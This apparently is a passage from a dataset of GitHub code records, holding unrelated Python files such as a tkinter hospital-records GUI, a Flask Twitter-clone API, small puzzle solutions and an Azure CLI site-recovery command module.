width=10)\r\n tree.column(\"FN\", anchor=W)\r\n tree.column(\"LN\", anchor=W)\r\n tree.column(\"Ailment\", anchor=W)\r\n tree.heading(\"#0\", text=\"Label\", anchor=W)\r\n tree.heading(\"ID\", text=\"ID\", anchor=CENTER)\r\n tree.heading(\"FN\", text=\"First Name\", anchor=W)\r\n tree.heading(\"LN\", text=\"Last Name\", anchor=W)\r\n tree.heading(\"Ailment\", text=\"Ailment\", anchor=W)\r\n\r\n\r\n button4 = Button(frame, text=\"Press to enter Patient Info\", command=enterPatientInfo)\r\n button4.grid(row=0, column=0, pady=10)\r\n button6 = Button(frame, text=\"Access Patient Info\", command=viewPatientData)\r\n button6.grid(row=0, column=1, pady=10)\r\n backButton.grid(row=0, column=3, pady=10)\r\n iter=0\r\n for i in newArr:\r\n x=str(i)\r\n cursor.execute(\"SELECT f_name FROM patient WHERE patient_id = ?\", (x,))\r\n f_name=cursor.fetchone()\r\n db.commit()\r\n f_name=deleteExtra(f_name)\r\n\r\n cursor.execute(\"SELECT l_name FROM patient WHERE patient_id = ?\", (x,))\r\n l_name=cursor.fetchone()\r\n db.commit()\r\n l_name=deleteExtra(l_name)\r\n\r\n cursor.execute(\"SELECT ailment FROM treat_plan WHERE patient_id = ? AND emp_id = ?\", (x, idnumber,))\r\n ailment=cursor.fetchone()\r\n db.commit()\r\n ailment=deleteExtra(ailment) #all data for a single tuple\r\n \r\n tree.insert(parent='', index='end', iid=iter, text='Parent',values=(x, f_name, l_name, ailment))\r\n iter+=1\r\n tree.grid(row=1, column=0, columnspan=3)\r\n#enter new patient info \r\ndef enterPatientInfo():\r\n for widget in botFrame.winfo_children():\r\n widget.grid_remove()\r\n\r\n botFrame.pack(side=BOTTOM)\r\n \r\n button2.grid(row=0,column=7)\r\n\r\n label3 = Label(botFrame, text=\"Enter new info: \")\r\n label3.grid(row=0, column=0)\r\n #bring the entries to the frame\r\n entry2.grid(row=0, columnspan=2, column=1)\r\n entry3.grid(row=0, columnspan=2, column=3)\r\n entry4.grid(row=0, columnspan=2, column=5)\r\n\r\n button3.grid(row=1, column=0)\r\n backButton.grid(row=0, column=4)\r\ndef viewPatientData():\r\n for widget in botFrame.winfo_children():\r\n widget.grid_remove()\r\n botFrame.pack(side=BOTTOM)\r\n\r\n entry5 = Entry(botFrame, width=25)\r\n entry5.grid(row=0,column=1, pady=10)\r\n label5 = Label(botFrame, text=\"Enter the Patient's ID\")\r\n label5.grid(row=0, column=0, pady=10)\r\n button7 = Button(botFrame, text=\"Access\", command=lambda:accessData(entry5.get()))\r\n button7.grid(row=0, column=2, pady=10)\r\n\r\ndef accessData(x):\r\n for widget in botFrame.winfo_children():\r\n widget.grid_remove()\r\n botFrame.pack(side=BOTTOM)\r\n\r\n label6 = Label(botFrame, text=\"Choose the data to view\")\r\n label6.grid(row=0, column=0)\r\n accButton1 = Button(botFrame, text=\"Appointments\", command=lambda:appt(x))\r\n accButton2 = Button(botFrame, text=\"Contact Info\", command=lambda:contact(x))\r\n accButton3 = Button(botFrame, text=\"Room Info\", command=lambda:room(x))\r\n accButton4 = Button(botFrame, text=\"Payment Data\", command=lambda:payment(x))\r\n accButton1.grid(row=0, column=1)\r\n accButton2.grid(row=0, column=2)\r\n accButton3.grid(row=0, column=3)\r\n accButton4.grid(row=0, column=4)\r\n\r\ndef appt(a):\r\n for widget in frame.winfo_children():\r\n widget.grid_remove()\r\n cursor.execute(\"SELECT appt_number FROM appointment WHERE patient_id = ?\", (a,))\r\n appointID=cursor.fetchall()\r\n cursor.execute(\"SELECT COUNT(appt_number) FROM appointment WHERE patient_id = ?\", (a,))\r\n x=cursor.fetchone()\r\n db.commit()\r\n newArr = tupleToArray(appointID, x)\r\n\r\n apptTree=ttk.Treeview(frame)\r\n apptTree['columns'] = (\"Patient Name\", \"Employee Name\", \"Date\")\r\n apptTree.column(\"#0\", width=1, minwidth=0)\r\n apptTree.column(\"Patient Name\", anchor=W)\r\n apptTree.column(\"Employee Name\", anchor=W)\r\n apptTree.column(\"Date\", anchor=W)\r\n apptTree.heading(\"#0\", text=\"Label\", anchor=W)\r\n apptTree.heading(\"Patient Name\", text=\"Patient Name\", anchor=W)\r\n apptTree.heading(\"Employee Name\", text=\"Employee Name\", anchor=W)\r\n apptTree.heading(\"Date\", text=\"Date\", anchor=W)\r\n\r\n backButton.grid(row=0, column=4, pady=10)\r\n addAppt=Button(frame, text=\"Add Appointments\", command=lambda:addAppointment(a))\r\n addAppt.grid(row=0,column=3)\r\n iter=0\r\n for i in newArr:\r\n x=str(i)\r\n #get patient name\r\n cursor.execute(\"SELECT patient_id FROM appointment WHERE appt_number= ?\", (x,))\r\n patient=str(cursor.fetchone())\r\n db.commit()\r\n patient=deleteExtra(patient)\r\n cursor.execute(\"SELECT f_name FROM patient WHERE patient_id = ?\", (patient,))\r\n f_name=str(cursor.fetchone())\r\n db.commit()\r\n f_name=deleteExtra(f_name)\r\n cursor.execute(\"SELECT l_name FROM patient WHERE patient_id = ?\", (patient,))\r\n l_name=str(cursor.fetchone())\r\n db.commit()\r\n l_name=deleteExtra(l_name)\r\n p_name=f_name + \" \" + l_name\r\n \r\n\r\n #get employee name\r\n cursor.execute(\"SELECT emp_id FROM appointment WHERE appt_number=?\", (x,))\r\n emp=str(cursor.fetchone())\r\n db.commit()\r\n emp=deleteExtra(emp) \r\n cursor.execute(\"SELECT f_name from employee WHERE emp_id = ?\", (emp,))\r\n f_name=str(cursor.fetchone())\r\n db.commit()\r\n f_name=deleteExtra(f_name)\r\n cursor.execute(\"SELECT l_name from employee WHERE emp_id = ?\", (emp,))\r\n l_name=str(cursor.fetchone())\r\n db.commit()\r\n l_name=deleteExtra(l_name)\r\n emp_name= f_name + \" \" + l_name\r\n \r\n\r\n cursor.execute(\"SELECT date FROM appointment WHERE appt_number = ?\", (x,))\r\n date=str(cursor.fetchone())\r\n db.commit()\r\n date=deleteExtra(date)\r\n newDate=strToDate(date)\r\n \r\n\r\n apptTree.insert(parent='', index='end', iid=iter, text='Parent',values=(p_name, emp_name, newDate))\r\n iter+=1\r\n apptTree.grid(row=1, column=0, columnspan=3)\r\n\r\ndef addAppointment(pat):\r\n apptLabel1 = Label(frame, text=\"Enter the date (For example: 4/26/2022 would be 4262022\")\r\n apptLabel1.grid(row=0, column=0)\r\n apptEntry1.grid(row=0, column=1)\r\n apptButton1 = Button(frame, text=\"Enter\", command=lambda:enter3(pat))\r\n apptButton1.grid(row=0, column=2)\r\n\r\ndef contact(a):\r\n for widget in frame.winfo_children():\r\n widget.grid_remove()\r\n cursor.execute(\"SELECT f_name FROM patient WHERE patient_id = ?\", (a,))\r\n f_name=str(cursor.fetchone())\r\n db.commit()\r\n f_name=deleteExtra(f_name)\r\n cursor.execute(\"SELECT l_name FROM patient WHERE patient_id = ?\", (a,))\r\n l_name=str(cursor.fetchone())\r\n db.commit()\r\n l_name=deleteExtra(l_name)\r\n p_name=f_name + \" \" + l_name\r\n \r\n cursor.execute(\"SELECT email FROM patient WHERE patient_id = ?\", (a,)) \r\n email=str(cursor.fetchone())\r\n db.commit()\r\n email=deleteExtra(email)\r\n\r\n cursor.execute(\"SELECT phone FROM patient WHERE patient_id = ?\", (a,))\r\n phone=str(cursor.fetchone())\r\n db.commit()\r\n phone=deleteExtra(phone)\r\n\r\n cursor.execute(\"SELECT address FROM patient WHERE patient_id = ?\", (a,))\r\n address=str(cursor.fetchone())\r\n db.commit()\r\n address=deleteExtra(address)\r\n\r\n cursor.execute(\"SELECT dob FROM patient WHERE patient_id = ?\", (a,))\r\n dob=str(cursor.fetchone())\r\n db.commit()\r\n dob=deleteExtra(dob)\r\n dob=strToDate(dob)\r\n\r\n cursor.execute(\"SELECT age FROM patient WHERE patient_id = ?\", (a,))\r\n age=str(cursor.fetchone())\r\n db.commit()\r\n age=deleteExtra(age)\r\n\r\n contactTree=ttk.Treeview(frame)\r\n contactTree['columns'] = (\"p_name\", \"email\", \"phone\", \"address\", \"dob\", \"age\")\r\n contactTree.column(\"#0\", width=1, minwidth=0)\r\n contactTree.column(\"p_name\", anchor=W)\r\n contactTree.column(\"email\", anchor=W)\r\n contactTree.column(\"phone\", anchor=W)\r\n contactTree.column(\"address\", anchor=W)\r\n contactTree.column(\"dob\", anchor=W)\r\n contactTree.column(\"age\", anchor=W)\r\n contactTree.heading(\"#0\", text=\"Label\", anchor=W)\r\n contactTree.heading(\"p_name\", text= \"Patient Name\", anchor=W)\r\n contactTree.heading(\"email\", text= \"Email Address\", anchor=W)\r\n contactTree.heading(\"phone\", text= \"Phone Number\", anchor=W)\r\n contactTree.heading(\"address\", text= \"Address\", anchor=W)\r\n contactTree.heading(\"dob\", text= \"Date of Birth\", anchor=W)\r\n contactTree.heading(\"age\", text= \"Age\", anchor=W)\r\n\r\n backButton.grid(row=0, column=4, pady=10)\r\n addCon=Button(frame, text=\"Update Contact\", command=lambda:addContact(a, p_name))\r\n addCon.grid(row=0,column=3)\r\n \r\n contactTree.insert(parent='', index='end', iid=iter, text='Parent',values=(p_name, email, phone, address, dob, age))\r\n contactTree.grid(row=1, column=0, columnspan=3)\r\n\r\ndef addContact(a, p_name):\r\n for widget in frame.winfo_children():\r\n widget.grid_remove()\r\n backButton.grid(row=0, column=7)\r\n contactLabel1 = Label(frame, text=\"Patient Name\")\r\n contactLabel2 = Label(frame, text=\"Email Address\")\r\n contactLabel3 = Label(frame, text=\"Phone Number\")\r\n contactLabel4 = Label(frame, text=\"Address\")\r\n contactLabel5 = Label(frame, text=\"Date of Birth\")\r\n contactLabel6 = Label(frame, text=\"Age\")\r\n contactLabel1.grid(row=0, column=1)\r\n contactLabel2.grid(row=0, column=2)\r\n contactLabel3.grid(row=0, column=3)\r\n contactLabel4.grid(row=0, column=4)\r\n contactLabel5.grid(row=0, column=5)\r\n contactLabel6.grid(row=0, column=6)\r\n contactLabel7 = Label(frame, padx=10, text=\"(For example: 4/26/2022 would be 4262022)\", wraplength=100)\r\n contactLabel7.grid(row=1, column=0)\r\n contactLabel8 = Label(frame, text=p_name, relief=RAISED)\r\n contactLabel8.grid(row=1, column=1)\r\n\r\n contactEntry1.grid(row=1, column=2)\r\n contactEntry2.grid(row=1, column=3)\r\n contactEntry3.grid(row=1, column=4)\r\n contactEntry4.grid(row=1, column=5)\r\n contactEntry5.grid(row=1, column=6)\r\n contactButton1 = Button(frame, text=\"Enter\", command=lambda:enter4(a), padx=10)\r\n contactButton1.grid(row=1, column=7)\r\n\r\ndef room(a):\r\n for widget in frame.winfo_children():\r\n widget.grid_remove()\r\n cursor.execute(\"SELECT f_name FROM patient WHERE patient_id = ?\", (a,))\r\n f_name=str(cursor.fetchone())\r\n db.commit()\r\n f_name=deleteExtra(f_name)\r\n cursor.execute(\"SELECT l_name FROM patient WHERE patient_id = ?\", (a,))\r\n l_name=str(cursor.fetchone())\r\n db.commit()\r\n l_name=deleteExtra(l_name)\r\n p_name=f_name + \" \" + l_name\r\n\r\n cursor.execute(\"SELECT room_number FROM patient_room WHERE patient_id = ?\", (a,))\r\n roomNum=cursor.fetchall()\r\n cursor.execute(\"SELECT COUNT(room_number) FROM patient_room WHERE patient_id = ?\", (a,))\r\n x=cursor.fetchone()\r\n db.commit()\r\n newArr=tupleToArray(roomNum, x)\r\n \r\n roomTree=ttk.Treeview(frame)\r\n roomTree['columns'] = (\"Patient Name\", \"Room\", \"Floor Number\", \"desc\")\r\n roomTree.column(\"#0\", width=1, minwidth=0)\r\n roomTree.column(\"Patient Name\", anchor=W)\r\n roomTree.column(\"Room\", anchor=W)\r\n roomTree.column(\"Floor Number\", anchor=W)\r\n roomTree.column(\"desc\", anchor=W)\r\n roomTree.heading(\"#0\", text=\"Label\", anchor=W)\r\n roomTree.heading(\"Patient Name\", text=\"Patient Name\", anchor=W)\r\n roomTree.heading(\"Room\", text=\"Room Number\", anchor=W)\r\n roomTree.heading(\"Floor Number\", text=\"Floor Number\", anchor=W)\r\n roomTree.heading(\"desc\", text=\"Room Description\", anchor=W)\r\n\r\n backButton.grid(row=0, column=4, pady=10)\r\n addR=Button(frame, text=\"Add patient to room\", command=lambda:addRoom(a))\r\n addR.grid(row=0,column=3)\r\n \r\n iter=0\r\n for i in newArr:\r\n strRoomNum=deleteExtra(i)\r\n cursor.execute(\"SELECT floor_number FROM room WHERE room_number = ?\", (i,))\r\n floor=str(cursor.fetchone())\r\n db.commit()\r\n floor=deleteExtra(floor)\r\n\r\n cursor.execute(\"SELECT description FROM room WHERE room_number = ?\", (i,))\r\n desc=str(cursor.fetchone())\r\n db.commit()\r\n desc=deleteExtra(desc)\r\n roomTree.insert(parent='', index='end', iid=iter, text='Parent',values=(p_name, strRoomNum, floor, desc))\r\n roomTree.grid(row=1, column=0, columnspan=3)\r\n \r\ndef addRoom(a): \r\n roomLabel1 = Label(frame, text=\"Enter the room number\")\r\n roomLabel1.grid(row=2, column=0, columnspan=2)\r\n roomEntry1.grid(row=3, column=1)\r\n \r\n roomButton1 = Button(frame, text=\"Enter\", command=lambda:enter5(a), pady=5)\r\n roomButton1.grid(row=3, column=2)\r\n \r\ndef payment(a):\r\n for widget in frame.winfo_children():\r\n widget.grid_remove()\r\n cursor.execute(\"SELECT payment_id FROM patient_pay WHERE patient_id = ?\", (a,))\r\n pay=cursor.fetchall()\r\n db.commit()\r\n cursor.execute(\"SELECT count(payment_id) FROM patient_pay WHERE patient_id = ?\", (a,))\r\n x=cursor.fetchone()\r\n pay=tupleToArray(pay,x)\r\n \r\n payTree=ttk.Treeview(frame)\r\n payTree['columns'] = (\"payment\", \"method\", \"insurance\")\r\n payTree.column(\"#0\", width=1, minwidth=0)\r\n payTree.column(\"payment\", anchor=W)\r\n payTree.column(\"method\", anchor=W)\r\n payTree.column(\"insurance\", anchor=W)\r\n payTree.heading(\"#0\", text=\"Label\", anchor=W)\r\n payTree.heading(\"payment\", text=\"Payment ID\", anchor=W)\r\n payTree.heading(\"method\", text=\"Payment Type\", anchor=W)\r\n payTree.heading(\"insurance\", text=\"Insurance Number\", anchor=W)\r\n \r\n backButton.grid(row=0, column=4, pady=10)\r\n addPay=Button(frame, text=\"Add Payment Method\", command=lambda:addPayment(a))\r\n addPay.grid(row=0,column=3)\r\n\r\n for i in pay:\r\n x=str(i)\r\n cursor.execute(\"SELECT method FROM payment_data WHERE payment_id = ?\",(x,))\r\n method=str(cursor.fetchone())\r\n db.commit()\r\n method=deleteExtra(method)\r\n cursor.execute(\"SELECT insurance_number FROM payment_data WHERE payment_id = ?\",(x,))\r\n insurNum=str(cursor.fetchone())\r\n db.commit()\r\n insurNum=deleteExtra(insurNum)\r\n\r\n payTree.insert(parent='', index='end', iid=iter, text='Parent',values=(i, method, insurNum))\r\n payTree.grid(row=1, column=0, columnspan=3)\r\n\r\ndef addPayment(a):\r\n payLabel1 = Label(frame, text=\"Enter your method and insurance number\")\r\n payLabel1.grid(row=2, column=0, columnspan=2)\r\n payEntry1.grid(row=3, column=0)\r\n payEntry2.grid(row=3, column=1)\r\n\r\n payButton1 = Button(frame, text=\"Enter\", command=lambda:enter6(a))\r\n payButton1.grid(row=3, column=2)\r\n\r\ndef enter():\r\n global val\r\n val=entry1.get()\r\n getPatientInfo(val)\r\n entry1.delete(0, END)\r\n\r\ndef enter2():\r\n f_name=str(entry2.get())\r\n l_name=str(entry3.get())\r\n ailment=str(entry4.get())\r\n entry2.delete(0,END)\r\n entry3.delete(0,END)\r\n entry4.delete(0,END)\r\n\r\n label4 = Label(botFrame, text=\"Succesful input\")\r\n cursor.execute(\"SELECT COUNT(treat_id) FROM treat_plan WHERE emp_id = ?\", val)\r\n x=cursor.fetchone()\r\n db.commit()\r\n y=0\r\n for n in x: #changing the count from tuple to int to use when creating the new array\r\n if not(n=='(' or n==',' or n==')'):\r\n y=n\r\n #inserting values into the patient table \r\n cursor.execute(\"\"\" \r\n INSERT INTO patient(f_name, l_name)\r\n Values(?,?)\r\n \"\"\", (f_name, l_name))\r\n #cursor.execute(\"\"\" #attempt to make a trigger\r\n # CREATE TRIGGER update_treat_plan\r\n # AFTER UPDATE ON patient\r\n # WHEN old.f_name <> new.f_name\r\n # OR old.l_name <> new.l_name\r\n #BEGIN\r\n # INSERT INTO treat_plan(\r\n # \"emp_id\",\r\n # \"patient_id\",\r\n # \"ailment\"\r\n # )\r\n # VALUES (\r\n # ?, (SELECT max(patient_id) from patient), ?\r\n #)\r\n #\"\"\", (val, ailment))\r\n cursor.execute(\"SELECT max(patient_id) FROM patient\")\r\n p_id = str(cursor.fetchone())\r\n db.commit()\r\n p_id=deleteExtra(p_id)\r\n cursor.execute(\"\"\"\r\n INSERT INTO treat_plan(emp_id, patient_id, ailment)\r\n VALUES(?,?,?)\r\n \"\"\", (val, p_id, ailment))\r\n db.commit()\r\n cursor.execute(\"SELECT COUNT(treat_id) FROM treat_plan WHERE emp_id = ?\", val)\r\n x=cursor.fetchone()\r\n db.commit()\r\n newY=0\r\n for n in x: #changing the count from tuple to int to use when creating the new array\r\n if not(n=='(' or n==',' or n==')'):\r\n newY=n\r\n if y 1:\n break\n else:\n continue\n break\n else:\n print(\"Found non-overlap at: \" + str(i))\n break\n","repo_name":"bannsec/advent_of_code","sub_path":"2018/3/part_2/win.py","file_name":"win.py","file_ext":"py","file_size_in_byte":2342,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"5"} +{"seq_id":"39551367019","text":"def run():\n # nombre = input(\"Ingresa tu nombre: \")\n # for letra in nombre:\n # print(letra)\n \n frase = input(\"Ingresa una frase: \")\n for caracter in frase:\n print(caracter.upper()) #Imprime cada caracter pero en mayuscula\n\n\nif __name__ == \"__main__\":\n run()","repo_name":"haroldadrada/Python_basico","sub_path":"11_recorrer.py","file_name":"11_recorrer.py","file_ext":"py","file_size_in_byte":289,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"72282724311","text":"# enter a number and return True/False\n# prime number\nwhile True:\n userInput = int(input(\"Please enter a number: \"))\n counter = 0\n for i in range(1,userInput+1):\n if userInput % i == 0:\n counter += 1\n \n if counter == 2:\n print(\"it is a prime number\") \n else:\n print(\"it is not a prime number\")\n\n","repo_name":"kitomicms/python_simple_projects","sub_path":"prime_number/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":319,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"70184654231","text":"from flask import Flask, request\nimport mariadb \nimport dbcreds\nimport users\nimport login\nimport follows\nimport followers\nimport tweets\nimport tweetLikes\nimport comment_likes\nimport comments\nimport tweetLikes\n\n\nfrom flask_cors import CORS \napp = Flask(__name__)\nCORS(app)\n\n@app.route(\"/api/user\",methods=[\"GET\", \"POST\", \"PATCH\", \"DELETE\"])\ndef getUsers():\n if request.method == \"GET\":\n return user.get_users()\n elif request.method == \"POST\":\n return user.post_user() \n elif request.method == \"PATCH\":\n return user.patch_user()\n elif request.method == \"DELETE\":\n return user.delete_user() \n else:\n Response(\"Not Supported\", mimetype=\"text/html\", status=500) \n\n@app.route(\"/api/login\", methods=[\"POST\", \"DELETe\"])\ndef user_login():\n if request.method == \"POST\":\n return login.post()\n elif request.method == \"DELETE\":\n return login.delete()\n else :\n Response(\"Not Supported\", mimetype=\"text/hmtl\", status=500) \n\n@app.route(\"/api/follows\", methods=[\"GET\", \"POST\", \"DELETE\"])\ndef follow_api():\n if request.method == \"GET\": \n return follows.get()\n elif request.method == \"POST\":\n return follows.post()\n elif request.method == \"DELETE\":\n return follows.delete()\n else: \n Response(\"Not Supported\", mimetype=\"text/html\", status=500)\n\n@app.route(\"/api/followers\", methods=[\"GET\"])\ndef followers_api():\n if request.method == \"GET\":\n return followers.get() \n else :\n Response(\"not supported\", mimetype=\"text/html\", status=500) \n\n@app.route(\"/api/tweets\",methods=[\"GET\",\"POST\",\"PATCH\",\"DELETE\"])\ndef tweet():\n if request.method == \"GET\":\n return tweets.get()\n elif request.method==\"POST\":\n return tweets.post()\n elif request.method==\"PATCH\":\n return tweets.patch()\n elif request.method==\"DELETE\":\n return tweets.delete()\n else :\n Response(\"not supported\", mimetype=\"text/html\", status=500)\n\n@app.route(\"/api/comments\",methods=[\"GET\",\"POST\",\"PATCH\",\"DELETE\"])\ndef comment():\n if request.method == \"GET\":\n return comments.get()\n elif request.method==\"POST\":\n return comments.post()\n elif request.method==\"PATCH\":\n return comments.patch()\n elif request.method==\"DELETE\":\n return comments.delete()\n else :\n Response(\"not supported\", mimetype=\"text/html\", status=500)\n\n@app.route(\"/api/tweet-likes\",methods=[\"GET\",\"POST\",\"DELETE\"])\ndef tweet_likes():\n if request.method == \"GET\":\n return tweetLikes.get()\n elif request.method==\"POST\":\n return tweetLikes.post()\n elif request.method==\"DELETE\":\n return tweetLikes.delete()\n else :\n Response(\"not supported\", mimetype=\"text/html\", status=500)\n\n@app.route(\"/api/comment-likes\",methods=[\"GET\",\"POST\",\"DELETE\"])\ndef commentLikes():\n if request.method == \"GET\":\n return comment_likes.get()\n elif request.method==\"POST\":\n return comment_likes.post()\n elif request.method==\"DELETE\":\n return comment_likes.delete()\n else :\n Response(\"not supported\", mimetype=\"text/html\", status=500)\n\n\n","repo_name":"Bellinazzi31/twiter2","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3135,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"14292253658","text":"from pyProcessReport import *\n\n# A project name as well as wafer name are required to build a report\nreport=ProcessReport('SFQ','WaferT053017A')\n\n# Building the appropriate layers to which processes will be later added\nM1 = Layer('M1', layer_comment='Bottom electrode of JJ stack and DC/SFQ shunt inductor.' )\nV2 = Layer('V2', layer_comment='JJ pocket definition in dielectric.')\nM2 = Layer('M2', layer_comment='JJ oxidation and wiring layer.')\n\n# Build processes which will be added to layers\nV2dep = PT70PECVD('01aug2017', process_comment='Ezpz')\n\nV2dep.add_parameter('Recipe Name (ch1)', 'SiOxide2')\nV2dep.add_parameters({'Platen Temperature (C)': '250',\n 'Deposition Material': 'SiOx',\n 'Thickness Target (nm)': '180',\n 'DC Response (V)': '-18'})\n\nV2dep.add_step({'step number': 1, 'step': 'Pre-clean Time (x2, s)', 'value': '150'})\n\nV2dep.add_steps([{'step number': 2, 'step': 'Pre-seed Time (s)', 'value': '500'},\n {'step number': 3, 'step': 'Deposition Time (s)', 'value': '350'}])\n\n\nV2etch = Unaxis790RIE('01aug2017', process_comment='Etch the Ezpz')\n\nV2etch.add_parameter('Recipe Name', '50CHF3')\nV2etch.add_parameters({'Platen': 'Carbon',\n 'Etched Material': 'PECVD SiOx',\n 'DC Response (V)': '272'\n })\n\nV2etch.add_step({'step number': 1, 'step': 'Pre-clean Time (s)', 'value': '300'})\n\nV2etch.add_steps([{'step number': 2, 'step': 'Pre-seed Time (s)', 'value': '0'},\n {'step number': 3, 'step': 'Etch Time (s)', 'value': '480'}])\n\n# Add processes to the appropriate layers\nV2.add_process(V2dep)\nV2.add_process(V2etch)\nV2.add_image('kitten.jpg', 'This is a kitten. It does not care about you.')\n\nV2.add_image('cat.jpg', 'This is a cat. It still does not care about you.')\n\n# Add layers to the report\nreport.add_layer(M1)\nreport.add_layer(V2)\nreport.add_layer(M2)\n\n# Build the report once all pieces are added to it\nreport.build_pdf(filename='testing1', save_tex=True)\n\n","repo_name":"McDermott-Group/pyProcessReport","sub_path":"testing/testReport.py","file_name":"testReport.py","file_ext":"py","file_size_in_byte":2087,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"10981167533","text":"import itertools\ndef solution(h, q):\n # solution(h: int, q: List[int]) -> List[int]\n\n def pair_siblings(p=-1, d=0, c=0):\n if p == -1:\n siblings.insert(c,[nodes[0]])\n pair_siblings(p=0, d=1, c=1)\n elif d < h:\n lc = p + 2**(h-d)\n rc = p + 1\n siblings.insert(c,[ nodes[lc], nodes[rc] ])\n pair_siblings(lc, d + 1, (2*c))\n pair_siblings(rc, d + 1, (2*c) + 1)\n\n def find_parents(q, siblings,parents=[]):\n btree = list(itertools.chain.from_iterable(siblings))\n for i in q:\n if i in btree:\n j = btree.index(i)\n if j == 0:\n parents.append(-1)\n else:\n p = int((j-1)/2)\n parents.append(btree[p])\n return parents\n\n max = (2**h+1) - 1\n nodes = list(reversed([ i for i in range(1, max)]))\n\n if not nodes:\n return [-1]\n\n # Create a list of siblings\n siblings=[]\n pair_siblings()\n\n return find_parents(q, siblings)\n\ntest = [1,2,3]\nprint(solution(5, [19, 14, 28]))\n#print(solution(4, test))\nprint(solution(3, [7, 3, 5, 1]))\n#print(solution(2, test))\nprint(solution(1, test))\nprint(solution(0, test))\n# def ptree(h,t,o,s=0):\n# for d in range(h):\n# n = 2**d\n# o.append([t[i] for i in range(s, n+s)])\n# s += n\n# return o\n #print(nodes)\n #print(ptree(h,t,o=[]))\n","repo_name":"xnorkl/google_code_challenge","sub_path":"level_2/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1280,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"40124251028","text":"from azure.cli.core.aaz import *\n\n\n@register_command(\n \"site-recovery network mapping create\",\n)\nclass Create(AAZCommand):\n \"\"\"Create operation to create an ASR network mapping.\n\n :example: network mapping create for A2A fabric\n az site-recovery network mapping create -g rg --fabric-name fabric1_name -n network_mapping1_name --network-name azureNetwork --vault-name vault_name --recovery-network-id vnet2_id --fabric-details '{azure-to-azure:{primary-network-id:vnetvm_id}}' --recovery-fabric-name fabric2_name\n\n :example: network mapping create for H2A E2A (VMM)\n az site-recovery network mapping create -g \"rg\" --fabric-name \"fabric_name\" -n \"network_mapping_name\" --network-name \"vnet_source_name\" --vault-name \"vault_name\" --recovery-network-id \"vnet_recovery_id\" --fabric-details '{vmm-to-azure:\"\"}'\n \"\"\"\n\n _aaz_info = {\n \"version\": \"2022-08-01\",\n \"resources\": [\n [\"mgmt-plane\", \"/subscriptions/{}/resourcegroups/{}/providers/microsoft.recoveryservices/vaults/{}/replicationfabrics/{}/replicationnetworks/{}/replicationnetworkmappings/{}\", \"2022-08-01\"],\n ]\n }\n\n AZ_SUPPORT_NO_WAIT = True\n\n def _handler(self, command_args):\n super()._handler(command_args)\n return self.build_lro_poller(self._execute_operations, self._output)\n\n _args_schema = None\n\n @classmethod\n def _build_arguments_schema(cls, *args, **kwargs):\n if cls._args_schema is not None:\n return cls._args_schema\n cls._args_schema = super()._build_arguments_schema(*args, **kwargs)\n\n # define Arg Group \"\"\n\n _args_schema = cls._args_schema\n _args_schema.fabric_name = AAZStrArg(\n options=[\"--fabric-name\"],\n help=\"Primary fabric name.\",\n required=True,\n )\n _args_schema.network_mapping_name = AAZStrArg(\n options=[\"-n\", \"--name\", \"--network-mapping-name\"],\n help=\"Network mapping name.\",\n required=True,\n )\n _args_schema.network_name = AAZStrArg(\n options=[\"--network-name\"],\n help=\"Primary network name.\",\n required=True,\n )\n _args_schema.resource_group = AAZResourceGroupNameArg(\n required=True,\n )\n _args_schema.vault_name = AAZStrArg(\n options=[\"--vault-name\"],\n help=\"The name of the recovery services vault.\",\n required=True,\n )\n\n # define Arg Group \"Properties\"\n\n _args_schema = cls._args_schema\n _args_schema.fabric_specific_details = AAZObjectArg(\n options=[\"--fabric-details\", \"--fabric-specific-details\"],\n arg_group=\"Properties\",\n help=\"Fabric specific input properties.\",\n )\n _args_schema.recovery_fabric_name = AAZStrArg(\n options=[\"--recovery-fabric-name\"],\n arg_group=\"Properties\",\n help=\"Recovery fabric Name.\",\n )\n _args_schema.recovery_network_id = AAZStrArg(\n options=[\"--recovery-network-id\"],\n arg_group=\"Properties\",\n help=\"Recovery network Id.\",\n required=True,\n )\n\n fabric_specific_details = cls._args_schema.fabric_specific_details\n fabric_specific_details.azure_to_azure = AAZObjectArg(\n options=[\"azure-to-azure\"],\n )\n fabric_specific_details.vmm_to_azure = AAZObjectArg(\n options=[\"vmm-to-azure\"],\n )\n\n azure_to_azure = cls._args_schema.fabric_specific_details.azure_to_azure\n azure_to_azure.primary_network_id = AAZStrArg(\n options=[\"primary-network-id\"],\n help=\"The primary azure vnet Id.\",\n required=True,\n )\n\n vmm_to_azure = cls._args_schema.fabric_specific_details.vmm_to_azure\n vmm_to_azure.location = AAZStrArg(\n options=[\"location\"],\n help=\"The Location.\",\n )\n return cls._args_schema\n\n def _execute_operations(self):\n self.pre_operations()\n yield self.ReplicationNetworkMappingsCreate(ctx=self.ctx)()\n self.post_operations()\n\n @register_callback\n def pre_operations(self):\n pass\n\n @register_callback\n def post_operations(self):\n pass\n\n def _output(self, *args, **kwargs):\n result = self.deserialize_output(self.ctx.vars.instance, client_flatten=True)\n return result\n\n class ReplicationNetworkMappingsCreate(AAZHttpOperation):\n CLIENT_TYPE = \"MgmtClient\"\n\n def __call__(self, *args, **kwargs):\n request = self.make_request()\n session = self.client.send_request(request=request, stream=False, **kwargs)\n if session.http_response.status_code in [202]:\n return self.client.build_lro_polling(\n self.ctx.args.no_wait,\n session,\n self.on_200,\n self.on_error,\n lro_options={\"final-state-via\": \"azure-async-operation\"},\n path_format_arguments=self.url_parameters,\n )\n if session.http_response.status_code in [200]:\n return self.client.build_lro_polling(\n self.ctx.args.no_wait,\n session,\n self.on_200,\n self.on_error,\n lro_options={\"final-state-via\": \"azure-async-operation\"},\n path_format_arguments=self.url_parameters,\n )\n\n return self.on_error(session.http_response)\n\n @property\n def url(self):\n return self.client.format_url(\n 